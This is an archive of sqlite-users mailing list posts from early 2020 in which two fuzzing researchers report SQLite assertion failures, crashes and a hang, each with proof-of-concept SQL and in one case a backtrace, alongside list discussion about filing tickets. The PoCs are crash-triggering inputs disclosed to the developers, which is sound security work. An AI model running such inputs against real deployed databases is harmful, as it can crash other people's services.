Re: [sqlite] Assertion `memIsValid(pCtx->argv[i])' failed.

[Yongheng Chen]

The error pic got stripped. It was 
"Database error: SQL logic error: {DELETE FROM ftsidx WHERE docid IN (SELECT 
rowid FROM ftsdocs WHERE type='t' AND rid=0 AND idxed)}”



> On Jan 9, 2020, at 7:17 PM, Yongheng Chen  wrote:
> 
> Hi,
> 
> We found an assertion failed in sqlite. Here’s the POC:
> —
> CREATE TABLE v0 ( v1 INT CHECK( datetime ( ( NULL ) ,( '1995-09-01' ) ,( 
> 'GERMANY' ) ,( 'MED P' ) ,( 'abc' ) ,( 'Y' ) ,( '13' ) ,( 'MED BAG' ) ,( 
> '199419' ) ,( 'LG CASE' ) ,( '1995-09-01' ) ,( 'SM BOX' ) ,( '' ) 
> ,( 'a' ) ,( 'c' ) ,( 'LG PACK' ) ,( 'GERMANY' ) ,( 'DELIVER IN PERSON' ) ,( 
> 'EUROPE' ) ,( 'abc' ) ,( 'MED BAG' ) ,( 'integrity-check' ) ,( 'PROMO%%' ) ,( 
> 'integrity-check' ) ,( 'abc' ) ,( '30' ) ,( '%%BRASS' ) ,( 'forest%%' ) ,( 
> 'AIR' ) ,( 'LG PACK' ) ,( 'LG PACK' ) ,( 'LG CASE' ) ,( 'GERMANY' 
> ) ,( 'MED PACK' ) ,( 'AIR' ) ,( 'MED PACK' ) ,( '23' ) ,( 'test' ) ,( '31' ) 
> ,( 'Brand#34' ) ,( 'PROMO%%' ) ,( '1995-03-15' ) ,( 'PROMO%%' ) ,( 'X' ) ,( 
> '**%s**' ) ,( 'forest%%' ) ,( 10 ) ,( NULL ) , v1 ) = v1 ) ) ;
> INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 9 ) ,( 10 ) ,( 
> '' ) ,( '18' ) ,( 
> 10.10 ) ,( 0 ) ,( 0 ) ,( 10 ) ,( 10 ) ,( 'SM PACK' ) ;
> —-
> 
> This exists in the debug built of latest chunk.
> 
> We tried reporting it by opening a ticket. But I met a the following problem 
> when submitting it:
> 
> 
> 
> Yongheng & Rui

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `memIsValid(pCtx->argv[i])' failed.

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 INT CHECK( datetime ( ( NULL ) ,( '1995-09-01' ) ,( 
'GERMANY' ) ,( 'MED P' ) ,( 'abc' ) ,( 'Y' ) ,( '13' ) ,( 'MED BAG' ) ,( 
'199419' ) ,( 'LG CASE' ) ,( '1995-09-01' ) ,( 'SM BOX' ) ,( '' ) 
,( 'a' ) ,( 'c' ) ,( 'LG PACK' ) ,( 'GERMANY' ) ,( 'DELIVER IN PERSON' ) ,( 
'EUROPE' ) ,( 'abc' ) ,( 'MED BAG' ) ,( 'integrity-check' ) ,( 'PROMO%%' ) ,( 
'integrity-check' ) ,( 'abc' ) ,( '30' ) ,( '%%BRASS' ) ,( 'forest%%' ) ,( 
'AIR' ) ,( 'LG PACK' ) ,( 'LG PACK' ) ,( 'LG CASE' ) ,( 'GERMANY' ) 
,( 'MED PACK' ) ,( 'AIR' ) ,( 'MED PACK' ) ,( '23' ) ,( 'test' ) ,( '31' ) ,( 
'Brand#34' ) ,( 'PROMO%%' ) ,( '1995-03-15' ) ,( 'PROMO%%' ) ,( 'X' ) ,( 
'**%s**' ) ,( 'forest%%' ) ,( 10 ) ,( NULL ) , v1 ) = v1 ) ) ;
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 9 ) ,( 10 ) ,( 
'' ) ,( '18' ) ,( 
10.10 ) ,( 0 ) ,( 0 ) ,( 10 ) ,( 10 ) ,( 'SM PACK' ) ;
—-

This exists in the debug built of latest chunk.

We tried reporting it by opening a ticket. But I met a the following problem 
when submitting it:



Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] A hang in Sqlite

[Yongheng Chen]

Will sending bugs to b...@sqlite.org <mailto:b...@sqlite.org> open a ticket in 
here? (https://www.sqlite.org/src/rptview?rn=1 
<https://www.sqlite.org/src/rptview?rn=1>) If yes it works for me. If not since 
many of the bugs we reported are silently fixed, it will be difficult for us to 
keep track of what we report. So if possible I wish I could be granted the 
access to opening a ticket.

Yongheng & Rui

> On Jan 6, 2020, at 9:44 AM, Simon Slavin  wrote:
> 
> On 6 Jan 2020, at 2:40pm, Yongheng Chen  wrote:
> 
>> I am sorry if I was polluting the mail list. As nobody mentioned that before 
>> and reporting bugs to this mail list is what is said in the official 
>> website, I just keep doing this.
> 
> You are going what we told you to do.  It is our fault.  You are doing very 
> well.
> 
> DRH has changed things and you may now send you email messages to 
> b...@sqlite.org.  This should make more people more happy.
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] A hang in Sqlite

[Yongheng Chen]

Hi,

I am sorry if I was polluting the mail list. As nobody mentioned that before 
and reporting bugs to this mail list is what is said in the official website, I 
just keep doing this. I think Manuel has the access to open a ticket. Could I 
be granted this access too so that I don’t need to send tons of emails. 

Thanks Richard and Dan for fixing everything we reported in a lightning way. We 
are really appreciated.

Yongheng & Rui

> On Jan 6, 2020, at 9:27 AM, Noel Frankinet  wrote:
> 
> Hello everybody,
> What is fuzzer sql ? Is it some sort of random sql generator ?
> How do they create that non sensical yet syntactically correct SQL ?
> Just curious.
> Regards
> Noël
> 
> On Mon, 6 Jan 2020 at 15:14, Dominique Devienne  wrote:
> 
>> On Mon, Jan 6, 2020 at 2:36 PM Jose Isaias Cabrera 
>> wrote:
>> 
>>> Dominique Devienne, on Monday, January 6, 2020 07:51 AM, wrote...
>>> [...] it's "polluting" a bit this ML.
>>> 
>>> This is why we are all so different.  I, actually enjoy the "pollution"
>>> because I try to look at the code and, some times, learn from it. But,
>> yes,
>>> I am learning, so this is new to me.  Perhaps, if I were to have more SQL
>>> knowledge, perhaps I would think the same.
>> 
>> 
>> Sure. I get that. But learning from fuzzer SQL is probably not the best way
>> to go about it, IMHO :)
>> They go into dark corners and even nonsensical SQL to find bugs, so hardly
>> newbie material.
>> 
>> And you can also look at the bug tracker at
>> https://www.sqlite.org/src/rptview?rn=1 for at least Mr Rigger's reports,
>> and possibly soon Yongheng Chen's reports too, if you miss them from the
>> ML. --DD
>> ___
>> sqlite-users mailing list
>> sqlite-users@mailinglists.sqlite.org
>> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
>> 
> 
> 
> -- 
> Noël Frankinet
> Strategis sprl
> 0478/90.92.54
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] A hang in Sqlite

[Yongheng Chen]

Hi,

We found a test case that hangs Sqlite:
—
CREATE TEMPORARY TABLE v0 ( v1 INT UNIQUE ) ;
WITH RECURSIVE v0 ( v1 ) AS ( SELECT -128 UNION SELECT v1 + 33 FROM v0 ) SELECT 
'x' from v0;
—

This seems triggering a dead loop. However, since v0 is empty, it might not 
enter a dead loop I think ? We are not sure whether this is a bug.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Root cause of an assertion failed.

[Yongheng Chen]

Hi,

We noticed that an assertion is converted back to a conditional in this check 
in(https://www.sqlite.org/src/info/4d0b9109f7a5312d4e136395e08b11dad64d746bc106ad44d47675e5b1dcb4ef
 
).
 We are surprised that this assertion exists for over 10 years. We tried to 
understand why such a condition is hardto be triggered but failed due to 
unfamiliarity of sqlite codebase. Currently our guessing is that this will be 
triggers by natural join(which uses group by implicitly),  a table with primary 
key and an IN expression. Could anyone help explain this? Thanks!


Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in Sqlite

[Yongheng Chen]

Hi,

We found a crash bug in sqlite. Here’s the POC:
—
CREATE VIRTUAL TABLE v0 USING rtree ( v3 AS( '1994-01-01' ) CHECK( v3 ) CHECK( 
v3 NOT LIKE 'y' ) GENERATED ALWAYS AS( ( SELECT 10.10 * AVG ( v3 ) FROM v0 
WHERE v1 = v3 ) ) , v2 , v1 ) ;
SELECT count ( * ) , max ( v3 ) FROM v0 ;
CREATE TABLE v4 ( v6 INTEGER , v5 INT ) ;
INSERT INTO v4 ( v5 ) VALUES ( 10 ) ,( 0.10 ) ;
SELECT * FROM v4 LEFT JOIN v0 ON v1 IN ( SELECT DISTINCT v6 LIMIT 0 ) AND v2 IN 
( 10 , 10 , 10 ) WHERE v1 = v1 AND v3 = 10 ;
—-

This exists in the latest development code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `(mFlags&MEM_Blob)==0 || sqlite3BlobCompare(pMem, pX)==0'

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v2 INTEGER PRIMARY KEY UNIQUE ON CONFLICT FAIL , v1 DOUBLE 
CHECK( ( v2 > 10 AND v1 >= 10 AND v2 <= 10 + 10 AND v1 BETWEEN 0 AND 10 AND v2 
IN ( '' , 'AIR REG' ) AND v2 NOT IN ( 0 , NULL , 10 ) AND v2 >= 10 ) + CASE v2 
WHEN 10 THEN 10 ELSE 10 END ) CHECK( julianday ( 10.10 ) ) ) ;
CREATE TRIGGER x AFTER UPDATE ON v0 BEGIN REPLACE INTO v0 SELECT v1 , SUM ( v1 
* ( 10 - v1 ) ) OVER( ORDER BY ( SELECT v1 FROM v0 AS x WHERE v1 IN ( v0 . v2 , 
127 , v0 . v1 ) GROUP BY v1 HAVING v2 + last_insert_rowid () ) ) AS REVENUE 
FROM v0 GROUP BY v2 ;
END ;
CREATE TEMP TRIGGER x BEFORE INSERT ON v0 BEGIN UPDATE v0 SET v1 = randomblob ( 
10 ) WHERE v1 >= 'EUROPE' AND v2 < ( SELECT v2 FROM v0 WHERE v2 < ( SELECT v1 
FROM v0 WHERE v0 . v2 = v0 . v2 GROUP BY v0 . v2 , v1 HAVING v1 > '18' ) GROUP 
BY v0 . v1 , v1 ) ;
END ;
INSERT INTO v0 ( v1 ) VALUES ( 'Y' ) ,( '**%s**' ) ,( 'Brand#23' ) ,( 'CANADA' 
);
—-

This exists in the latest development code built with debug flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in sqlite

[Yongheng Chen]

Hi,

We found a crash bug in sqlite. Here’s the POC:
—
CREATE VIRTUAL TABLE v0 USING fts4 ( v1 AS( typeof ( v5 ) ) , v6 UNIQUE 
GENERATED ALWAYS AS( v5 ) , v2 INT , v3 INT UNIQUE GENERATED ALWAYS AS( NULL ) 
, v4 INTEGER UNIQUE , v5 DOUBLE PRIMARY KEY CHECK( v4 ) , v7 VARCHAR(20) UNIQUE 
) ;
INSERT INTO v0 ( v5 ) VALUES ( 9223372036854775808.00 );
REPLACE INTO zipfile SELECT * FROM v0 WHERE EXISTS ( SELECT v2 FROM v0 
INTERSECT SELECT v4 FROM v0 ) ;
—-

This exists in the latest development code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `memIsValid(&pMem[i])' failed.

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. And this assertion seems not to be 
fixed completely. Here’s the POC:
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ;
INSERT INTO v0 ( v1 ) VALUES ( NULL ) ,( NULL ) ;
SELECT ifnull ( v1 , max ( ( SELECT printf ( 's%' , 3 , 0 , 0.10 ) ) ) ) , 
max ( v1 ) , count ( v1 ) FROM v0 ;
—-

This exists in the latest development code built with debug flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `0' failed.

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. And this assertion seems not to be 
fixed completely. Here’s the POC:
—
CREATE TABLE v0 ( v8 FLOAT , v7 UNIQUE ON CONFLICT ROLLBACK GENERATED ALWAYS 
AS( v6 ) , v6 INT , v5 INT UNIQUE GENERATED ALWAYS AS( NULL ) , v4 INTEGER 
UNIQUE , v3 DOUBLE PRIMARY KEY CHECK( v6 ) , v2 VARCHAR(20) UNIQUE , v1 FLOAT 
CHECK( julianday ( 'MED P' ) ) CHECK( v6 NOT LIKE 'b' ) NOT NULL ON CONFLICT 
REPLACE UNIQUE UNIQUE ON CONFLICT ROLLBACK ) ;

CREATE VIEW v9 ( v10 ) AS SELECT v4 FROM v0 WHERE v2 = 'Brand#12' AND v6 != v1 
OR ( v1 BETWEEN 10 AND v3 ) ;

SELECT 10 FROM v9 WHERE 1 = v10 OR NULL BETWEEN ( SELECT v10 FROM v9 AS 
prep_inst WHERE NULL BETWEEN ( SELECT sum ( v8 ) OVER( ) AS myname FROM v0 AS x 
GROUP BY 1 ) AND 10 GROUP BY v10 ) AND 10 ;
—-

This exists in the latest development code built with debug flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Undefined behavior in fopen64 in sqlite3

[Yongheng Chen]

Hi,

We found an undefined behavior in sqlite. Here’s the POC:
—
DELETE FROM zipfile WHERE NULL BETWEEN ( 2) AND 1 ;
—-

When compiled with `-fsanitize=address`, it got a crash. We found that it’s 
because it tries to use `fopen64(NULL, “ab+”)` in zipfileBegin. And fopen64 
with NULL seems an undefined behavior. So we think developers might want to fix 
it in order to avoid undefined behaviors in sqlite to make it more robust.


Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `memIsValid(pRec)' failed

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. And this assertion seems not to be 
fixed completely. Here’s the POC:
—
CREATE TABLE v0 ( v1 ) ;
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 10 ) ;
UPDATE v0 SET v1 = ( SELECT coalesce ( quote ( NULL ) , quote ( v1 ) , ( SELECT 
1 FROM v0 AS v WHERE ( SELECT v1 FROM v0 WHERE v1 > v1 ) ) , 10 ) FROM v0 ORDER 
BY zeroblob ( v1 ) ) ;
—-

This exists in the latest development code built with debug flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `(mFlags&MEM_Str)==0 || (pMem->n==pX->n && pMem->z==pX->z)' failed.

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 VARCHAR(15) ) ;
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 10 ) ;
UPDATE v0 SET v1 = ( SELECT coalesce ( quote ( NULL ) , quote ( v1 ) , quote ( 
v1 ) , 0 ) FROM v0 ORDER BY substr ( v1 , v1 , 10 ) ) ;
—-

This exists in release version and the latest development code built with debug 
flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `memIsValid(pRec)' failed

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 CHAR(25) ) ;
CREATE TRIGGER myname AFTER INSERT ON v0 BEGIN INSERT INTO v0 SELECT ( SELECT 
ifnull ( count ( DISTINCT ( SELECT v1 FROM v0 ) ) , 10 ) ) FROM v0 AS d WHERE 
v1 = v1 AND v1 <= v1 GROUP BY v1 , v1 ORDER BY v1 , v1 ;
END ;
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 0 ) ;
—-

This exists in the latest development code built with debug flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `memIsValid(&aMem[p1+idx])' failed.

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 DOUBLE PRIMARY KEY ) ;
INSERT INTO v0 VALUES ( 10 ) ;
SELECT * FROM v0 NATURAL JOIN v0 NATURAL JOIN v0 WHERE v1 = 9223372036854775807 
OR ( ( v1 = ( SELECT 10 + sum ( v1 LIKE 'LG PACK' ) OVER( ORDER BY v1 ) ) AND 
16 ) OR v1 = 10 ) AND v1 <= 10 + 10 AND v1 BETWEEN 10 AND 10 ;
—-

This exists in the latest development code built with debug flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `pRes->iTable==pSrc->a[0].iCursor'

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v2 INTEGER PRIMARY KEY , v1 AS( 10.10 ) UNIQUE ) ;
SELECT * FROM v0 WHERE v1 + 10 IN ( SELECT v2 FROM v0 NATURAL JOIN v0 WHERE v2 
IN ( SELECT v1 FROM v0 ORDER BY v1 ) ) ;
—-

This exists in the latest development code built with debug flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `pC!=0' failed.

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ON CONFLICT ROLLBACK NOT NULL ON 
CONFLICT IGNORE , v2 FLOAT AS( 'BUILDING' ) CHECK( 10 ) CHECK( v2 NOT LIKE 'MED 
BAG' ) NOT NULL UNIQUE ) ;
INSERT INTO v0 VALUES ( 10 ) ;
SELECT * FROM v0 JOIN v0 USING ( v1 , v2 , v1 , v1 , v1 , v2 ) WHERE ( ( ( 1 = 
( SELECT v0 . v1 FROM v0 AS x GROUP BY v2 ) AND v2 = 0 ) OR v1 = 10 ) ) AND v2 
IN ( SELECT v2 FROM v0 ) ;
—-

This exists in the latest development code built with debug flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion `pWalker->eCode==0' failed.

[Yongheng Chen]

Hi,

We found an assertion failed in sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 INT , v2 INT ) ;
CREATE TABLE v3 ( v4 DOUBLE PRIMARY KEY UNIQUE NOT NULL ) ;
SELECT * FROM v3 LEFT JOIN v0 ON v1 = 10 WHERE ( v2 < 10 AND v1 = 10 ) > ( v2 < 
0 AND v1 > 10 AND ( v1 = 10 AND 10 ) ) ORDER BY v1 DESC , v2 DESC ;
—-

This exists in the latest development code built with debug flag.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash Bug In sqlite

[Yongheng Chen]

Hi, 

We found a crash bug in sqlite. Here’s the POC:
—
CREATE VIRTUAL TABLE v0 USING fts4 ( v1 , v2 , v3 , v4 ) ;
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 10 ) ; 
CREATE TABLE v5 ( v6 UNIQUE NOT NULL PRIMARY KEY UNIQUE ) ; 
INSERT INTO v5 ( v6 , v6 ) SELECT nullif ( DISTINCT zeroblob ( julianday () ) , 
v3 ) , v1 + 10 FROM v0 ;
—

Here’s the backtrace:
—
#0  __memcmp_sse4_1 () at ../sysdeps/x86_64/multiarch/memcmp-sse4.S:69
#1  0x00661302 in sqlite3BlobCompare (pB1=, 
pB2=) at sqlite3.c:81071
#2  0x0063d703 in sqlite3VdbeMemAboutToChange (pVdbe=, 
pMem=) at sqlite3.c:75954
#3  0x00626b49 in sqlite3VdbeExec (p=) at sqlite3.c:85159
#4  0x004b076b in sqlite3Step (p=) at sqlite3.c:82730
#5  sqlite3_step (pStmt=) at sqlite3.c:17259
#6  0x00484686 in exec_prepared_stmt (pArg=0x7fff5a635990, 
pStmt=0x1956950) at shell.c:11383
#7  0x00442eea in shell_exec (pArg=, zSql=, pzErrMsg=) at shell.c:11688
#8  0x00487ad8 in runOneSqlLine (p=0x7fff5a635990,
zSql=0x193b480 "CREATE VIRTUAL TABLE v0 USING fts4 ( v1 , v2 , v3 , v4 ) ; 
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 10 ) ; CREATE TABLE v5 ( v6 UNIQUE NOT 
NULL PRIMARY KEY UNIQUE ) ; INSERT INTO v5 ( v6 , v6 ) SELECT n"...,
in=0x7f6b75fe38e0 <_IO_2_1_stdin_>, startline=1) at shell.c:18269
#9  0x00449a9f in process_input (p=) at shell.c:18369
#10 0x00418fb2 in main (argc=, argv=) at 
shell.c:19135
—

The bug exists in the latest development code. 

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] sqlite3VdbeMemAboutToChange(Vdbe *, Mem *): Assertion `(mFlags&MEM_Str)==0 || (pMem->n==pX->n && pMem->z==pX->z)' failed.

[Yongheng Chen]

Hi,

We found a debug assertion bug in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v1 , v2 FLOAT ) ;
CREATE TRIGGER x AFTER INSERT ON v0
BEGIN
INSERT INTO v0 SELECT DISTINCT v2 / 10 , v2 / 1 FROM v0 ;
END;
INSERT INTO v0 ( v1 , v1 ) VALUES ( '' , 10 ) ,( '' , 0 ) ,( 'AIR' , 10 );
UPDATE v0 SET v2 = randomblob ( v2 ) ;
SELECT coalesce ( max ( quote ( v1 ) ) , 10 ) FROM v0 GROUP BY v1 ;
—

This bug affects debug builds based on trunk and the latest release version.

Special thanks to Manuel Rigger for all his help. And thanks every one in the 
sqlite team for your great work. 

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion Bug in Sqlite

[Yongheng Chen]

Hi,

We found an assertion bug in Sqlite. Here’s the PoC:

—
CREATE TABLE v0 ( v1 ) ; CREATE TABLE v2 ( v3 INTEGER UNIQUE ON CONFLICT ABORT 
) ; CREATE TRIGGER x AFTER INSERT ON v2 WHEN ( ( SELECT v1 AS PROMO_REVENUE 
FROM v2 JOIN v0 USING ( VALUE ) ) AND 0 ) BEGIN DELETE FROM v2 ; END ; CREATE 
VIRTUAL TABLE v4 USING fts4 ( v5 FLOAT UNIQUE AS( 'AIR' ) , v7 UNIQUE GENERATED 
ALWAYS AS( v1 ) , v9 INT CHECK( NOT v3 < 'BUILDING' ) , v8 INT UNIQUE GENERATED 
ALWAYS AS( NULL ) , v6 ) ; ALTER TABLE zipfile RENAME TO x ;
—

This needs to be run in one line and the bug exists in the latest development 
code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Debug Assertion Bug in Sqlite

[Yongheng Chen]

Hi,

We found some assertion bugs in sqlite. Here’s the pocs:

#1
—
CREATE TABLE v0 ( v1 , v2 PRIMARY KEY ON CONFLICT REPLACE ) ; CREATE TEMP 
TRIGGER x BEFORE INSERT ON v0 BEGIN INSERT INTO v0 ( v1 ) VALUES ( 10 ) ; END ; 
CREATE VIRTUAL TABLE v3 USING rtree ( v4 AS( v2 = 'MED PACK' ) , v5 AS( v2 + v2 
) , v6 AS( v2 ) CHECK( v5 ) ) ; CREATE TABLE v7 ( v8 TEXT , v9 ) ; VACUUM ; 
INSERT INTO v7 VALUES ( 10 , 10 ) ; INSERT INTO v0 VALUES ( 10 , 10 ) ; UPDATE 
v0 SET v1 = '1995-03-15' WHERE ( substr ( v1 / 10 , 10 ) % 2 ) == 2 ; SELECT * 
FROM v7 LEFT JOIN v3 ON v6 = 3 OR v4 = 1 WHERE v6 = v4 AND v4 = 10 GROUP BY 3 ;

Bitmask sqlite3WhereCodeOneLoopStart(Parse *, Vdbe *, WhereInfo *, int, 
WhereLevel *, Bitmask): Assertion `(pTerm->prereqRight & pLevel->notReady)!=0' 
failed.
—
This bug seems to be incompletely fixed and still exists in the latest 
development code.

#2
—
CREATE TABLE v0 ( v1 , v2 FLOAT ) ; CREATE TEMP TRIGGER x BEFORE INSERT ON v0 
BEGIN INSERT INTO v0 ( v1 , v2 ) VALUES ( 10 , 1.10 ) ,( 10 , 0.10 ) ,( 
10 , 1.10 ) ,( 10 , 10.10 ) ,( 1 , 10.10 ) ; END ; CREATE TRIGGER x 
AFTER INSERT ON v0 BEGIN INSERT INTO v0 ( v2 , v1 ) VALUES ( 10 , 
9223372036854775807 ) ,( 1 , 10 ) ,( 1 , 10 ) ,( 10 , 2 ) ,( 3 , 2 ) ,( 3 , 3 ) 
; END ; INSERT INTO v0 ( v1 ) VALUES ( 8 ) ,( 10 ) ,( 2 ) ,( 10.10 ) ,( 
10.10 ) ,( 2 ) ,( 0 ) ,( 10 ) ,( 10.10 ) ON CONFLICT DO NOTHING ; 
SELECT v1 FROM v0 WHERE v1 IN ( 10.10 , v1 ) ORDER BY v1 LIMIT 0 ; UPDATE 
v0 SET v1 = 'LG CASE' WHERE v1 = NULL OR v1 > 0 AND unlikely ( DISTINCT v1 ) ; 
CREATE INDEX v3 ON v0 ( v1 , v2 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , 
v2 ) ; ANALYZE v3 ; SELECT v1 , v2 FROM v0 WHERE v2 IN ( 10 ) ORDER BY v1 , v1 
NULLS LAST , v2 , v2 DESC , 1.10 ;

Bitmask sqlite3WhereCodeOneLoopStart(Parse *, Vdbe *, WhereInfo *, int, 
WhereLevel *, Bitmask): Assertion `pLoop->nSkip==0' failed.
—
This bug exists in the latest development code and release code.

#3

—
CREATE TABLE v0 ( v2 VARCHAR(20) , v1 FLOAT ) ; INSERT INTO v0 ( v2 , v1 ) 
VALUES ( 1 , 10 ) ; INSERT INTO v0 VALUES ( 
'' , 10 ) ,( 1.10 , 
10 ) ,( '1994-01-01' , 4294967295 ) ,( '29' , 10 ) ; SELECT AVG ( 10 ) OVER( 
ORDER BY v2 ) AS xyz FROM v0 ORDER BY v2 ASC ; SELECT DISTINCT CAST ( round ( 
zipfile ( v1 , v2 ) , zeroblob ( v1 ) ) AS INTEGER ) FROM v0 ; CREATE VIEW v3 ( 
v4 ) AS SELECT sum ( v1 ) OVER( ) FROM v0 UNION ALL SELECT v1 FROM v0 ; SELECT 
( SELECT v4 FROM v3 WHERE 10 = v4 ) , * FROM v3 WHERE v4 > 10 ;

int sqlite3VdbeExec(Vdbe *): Assertion `pOp->p3>0' failed.
—
This bug exist in the latest development code and release code.


Yongheng & Rui

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion Bug in sqlite

[Yongheng Chen]

Hi,

There’s one bug that triggers assertion failed in sqlite:
—
CREATE TABLE v0 ( v1 ) ; 
CREATE TABLE v2 ( v3 VARCHAR(1) UNIQUE ) ; 
SELECT * FROM v0 WHERE v1 IN ( 'AIR' ) GROUP BY v1 , v1 ; 
CREATE INDEX v4 ON v0 ( v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , 
v1 , v1 , v1 , v1 ) WHERE v1 IS NOT NULL ; 
UPDATE v0 SET v1 = v1 + 10 WHERE ( v1 = '1995-03-15' OR v1 = '**%s**' ) AND v1 
IS NOT NULL OR ( v1 = 10 ) ; 
SELECT DISTINCT 10 FROM v4 AS NO_CACHE NATURAL JOIN v2 NATURAL JOIN v4 WHERE v1 
= v4 . v1 OR v1 = v4 . v1 ;
—

The bug exists in both development code and release code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion Bugs in Sqlite

[Yongheng Chen]

Hi,

We found some assertion bugs in sqlite:
#1
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY UNIQUE ) ; 
INSERT INTO v0 VALUES ( 10 ) ON CONFLICT DO NOTHING ; 
SELECT * FROM v0 NATURAL JOIN v0 AS y WHERE v1 IN ( SELECT DISTINCT v1 FROM v0 
ORDER BY v1 );

sqlite3.c:100324: Select *isCandidateForInOpt(Expr *): Assertion 
`p->pGroupBy==0' failed.
— 

This bug exists in the development code and release code.
#2
—
